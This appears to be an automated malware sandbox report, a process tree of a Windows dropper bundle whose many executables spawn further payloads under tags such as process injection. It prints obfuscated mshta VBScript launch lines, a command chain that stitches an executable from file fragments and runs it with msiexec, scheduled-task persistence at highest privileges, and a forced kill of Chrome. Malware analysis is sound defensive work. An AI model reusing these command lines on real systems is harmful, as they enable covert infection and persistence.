                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Fri2050293ea5.exe
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                  PID:3332
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\Fri2050293ea5.exe
                                                                                                                                                                    Fri2050293ea5.exe
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                    PID:2304
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Fri209f6924af86d795.exe /mixone
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                  PID:1752
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\Fri209f6924af86d795.exe
                                                                                                                                                                    Fri209f6924af86d795.exe /mixone
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:3956
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3956 -s 660
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:4416
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3956 -s 696
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:4572
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3956 -s 700
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:4216
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3956 -s 696
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:4608
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3956 -s 656
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:1236
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Fri20ba391d4469.exe
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:1052
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\Fri20ba391d4469.exe
                                                                                                                                                                      Fri20ba391d4469.exe
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:3460
                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                        "C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell"). RUN ( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\Fri20ba391d4469.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF """" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\Fri20ba391d4469.exe"" ) do taskkill /f /IM ""%~NxA"" " , 0 , true ) )
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:3560
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\Fri20ba391d4469.exe" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF "" == "" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\Fri20ba391d4469.exe" ) do taskkill /f /IM "%~NxA"
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:4176
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe
                                                                                                                                                                                EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:4656
                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell"). RUN ( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF ""/pkrs9YKWRf3sVprfXBE2vA2Yg3 "" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" ) do taskkill /f /IM ""%~NxA"" " , 0 , true ) )
                                                                                                                                                                                    9⤵
                                                                                                                                                                                      PID:4440
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF "/pkrs9YKWRf3sVprfXBE2vA2Yg3 " == "" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" ) do taskkill /f /IM "%~NxA"
                                                                                                                                                                                        10⤵
                                                                                                                                                                                          PID:4940
                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VbsCript:CloSE ( CreAtEoBjEct ( "WscRiPt.ShElL" ). RUN ( "C:\Windows\system32\cmd.exe /R eCHo | sET /P = ""MZ"" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W + pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT + lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ " , 0 , tRUE ) )
                                                                                                                                                                                        9⤵
                                                                                                                                                                                          PID:3212
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /R eCHo | sET /P = "MZ" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W + pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT + lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ
                                                                                                                                                                                            10⤵
                                                                                                                                                                                              PID:4128
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                                                                                                                                                                                                11⤵
                                                                                                                                                                                                  PID:4444
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>nQBnLF9A.W"
                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                    PID:840
                                                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                    msiexec /Y .\6~iPCLZ.rJ
                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                      PID:3732
                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                taskkill /f /IM "Fri20ba391d4469.exe"
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                PID:4844
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Fri2002ce5f91c761.exe
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:1180
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\Fri2002ce5f91c761.exe
                                                                                                                                                                                            Fri2002ce5f91c761.exe
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                            PID:1592
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Fri209c4b463b.exe
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:1760
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Fri20fbc038b0b02ea.exe
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:1960
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\Fri20fbc038b0b02ea.exe
                                                                                                                                                                                                Fri20fbc038b0b02ea.exe
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                PID:3864
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\Fri20fbc038b0b02ea.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\Fri20fbc038b0b02ea.exe
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:4020
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Fri209d5bfbb2.exe
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:3216
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\Fri209d5bfbb2.exe
                                                                                                                                                                                                  Fri209d5bfbb2.exe
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:2088
                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\Va9ClYtbLv3dxYoQ49qpgkeC.exe
                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\Va9ClYtbLv3dxYoQ49qpgkeC.exe"
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:4324
                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\Qqz5SnYXnklPYHXGgWOEn9mC.exe
                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\Qqz5SnYXnklPYHXGgWOEn9mC.exe"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:1412
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:5804
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:1256
                                                                                                                                                                                                        • C:\Users\Admin\Documents\PEPES8ty_4rLgHepIDFk2DnS.exe
                                                                                                                                                                                                          "C:\Users\Admin\Documents\PEPES8ty_4rLgHepIDFk2DnS.exe"
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                            PID:5788
                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\aFztjGCCpg6_pvZAecskgMK8.exe
                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\aFztjGCCpg6_pvZAecskgMK8.exe"
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                PID:5732
                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\JPFy3cqYc6bYK9zKCduL6VI2.exe
                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\JPFy3cqYc6bYK9zKCduL6VI2.exe"
                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                  PID:4508
                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\KpMBsMZQ1Bg2Rq6YAYBXapQp.exe
                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\KpMBsMZQ1Bg2Rq6YAYBXapQp.exe"
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                    PID:5180
                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\IVSWX8WmZ18T5O8jN0FJsUE_.exe
                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\IVSWX8WmZ18T5O8jN0FJsUE_.exe"
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                      PID:2500
                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\2_jjaylI6LlyTULQUGWpNhU2.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\2_jjaylI6LlyTULQUGWpNhU2.exe"
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                        PID:6116
                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\fUA6QOx1nxIrAwYvnGSqoYuf.exe
                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\fUA6QOx1nxIrAwYvnGSqoYuf.exe"
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                          PID:3984
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\fUA6QOx1nxIrAwYvnGSqoYuf.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\fUA6QOx1nxIrAwYvnGSqoYuf.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                              PID:5532
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\fUA6QOx1nxIrAwYvnGSqoYuf.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\fUA6QOx1nxIrAwYvnGSqoYuf.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                  PID:5696
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                    taskkill -f -iM "fUA6QOx1nxIrAwYvnGSqoYuf.exe"
                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                    PID:6524
                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\gy5qL7EZta6ApK0RrAVBTQj4.exe
                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\gy5qL7EZta6ApK0RrAVBTQj4.exe"
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                PID:6100
                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\JTJd14WbjcQ_agrP8zYoI6Bl.exe
                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\JTJd14WbjcQ_agrP8zYoI6Bl.exe"
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                  PID:5180
                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\hgtax6wyrHKNZLKk02ESghxA.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\hgtax6wyrHKNZLKk02ESghxA.exe"
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                    PID:4164
                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\hgtax6wyrHKNZLKk02ESghxA.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\hgtax6wyrHKNZLKk02ESghxA.exe" -u
                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                        PID:6260
                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\Z4UZG9YvxS_iUxgtrvAM9So2.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\Z4UZG9YvxS_iUxgtrvAM9So2.exe"
                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                        PID:4436
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-UG1S0.tmp\Z4UZG9YvxS_iUxgtrvAM9So2.tmp
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-UG1S0.tmp\Z4UZG9YvxS_iUxgtrvAM9So2.tmp" /SL5="$1045E,506127,422400,C:\Users\Admin\Pictures\Adobe Films\Z4UZG9YvxS_iUxgtrvAM9So2.exe"
                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                            PID:6196
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-ES7G8.tmp\DYbALA.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-ES7G8.tmp\DYbALA.exe" /S /UID=2709
                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                PID:6668
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\12-ca12d-a90-b8f96-6ef50b080fb34\Lerocakisa.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\12-ca12d-a90-b8f96-6ef50b080fb34\Lerocakisa.exe"
                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                    PID:6688
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\9e-d0cee-d0a-8798a-d786c8e678cac\Bihaeqomyso.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\9e-d0cee-d0a-8798a-d786c8e678cac\Bihaeqomyso.exe"
                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                      PID:5404
                                                                                                                                                                                                                                                    • C:\Program Files\Windows Media Player\AQFNQVAEZR\foldershare.exe
                                                                                                                                                                                                                                                      "C:\Program Files\Windows Media Player\AQFNQVAEZR\foldershare.exe" /VERYSILENT
                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                        PID:6872
                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\bCHlht7QIYolZOyIHHT8Ikjl.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\bCHlht7QIYolZOyIHHT8Ikjl.exe"
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                PID:4440
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 688
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                  PID:1788
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 700
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                  PID:3176
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 204
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                  PID:5060
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 692
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                  PID:5136
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 1120
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                  PID:2816
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 1112
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                  PID:5896
                                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\uRzOo9oMjz5dKQHqkQeCBZng.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\uRzOo9oMjz5dKQHqkQeCBZng.exe"
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                  PID:4244
                                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\yFSun3xaB0K8tGwZd0HcZD73.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\yFSun3xaB0K8tGwZd0HcZD73.exe"
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                    PID:3400
                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\yFSun3xaB0K8tGwZd0HcZD73.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\yFSun3xaB0K8tGwZd0HcZD73.exe"
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                        PID:4148
                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\F3B8onUFgoDP8N5bbmaCWl9v.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\F3B8onUFgoDP8N5bbmaCWl9v.exe"
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                        PID:4108
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Fri2060ea1c5d8fae8aa.exe
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:2788
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Fri20e095683c2b3a0c.exe
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:3928
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1572 -s 600
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                        PID:1284
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Fri208f5f140853548.exe
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:964
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Fri20c0c46650eeb2a.exe
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:2472
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Fri20d5530575e8aa3ed.exe
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                            PID:1276
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Fri200ae385720d3.exe
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                            PID:3196
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\Fri20c0c46650eeb2a.exe
                                                                                                                                                                                                                                                      Fri20c0c46650eeb2a.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      PID:1776
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\Fri2060ea1c5d8fae8aa.exe
                                                                                                                                                                                                                                                      Fri2060ea1c5d8fae8aa.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                      PID:2084
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:3404
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                            taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                            PID:5108
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\Fri208f5f140853548.exe
                                                                                                                                                                                                                                                        Fri208f5f140853548.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        PID:2168
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\Fri208f5f140853548.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\Fri208f5f140853548.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:2252
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\Fri20e095683c2b3a0c.exe
                                                                                                                                                                                                                                                          Fri20e095683c2b3a0c.exe
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                          PID:588
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-L9I8P.tmp\Fri20d5530575e8aa3ed.tmp
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-L9I8P.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$7005C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\Fri20d5530575e8aa3ed.exe"
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                          PID:504
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\Fri20d5530575e8aa3ed.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\Fri20d5530575e8aa3ed.exe" /SILENT
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            PID:740
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-I541B.tmp\Fri20d5530575e8aa3ed.tmp
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-I541B.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$8005C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\Fri20d5530575e8aa3ed.exe" /SILENT
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                              PID:596
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\Fri20d5530575e8aa3ed.exe
                                                                                                                                                                                                                                                          Fri20d5530575e8aa3ed.exe
                                                                                                                                                                                                                                                          1⤵
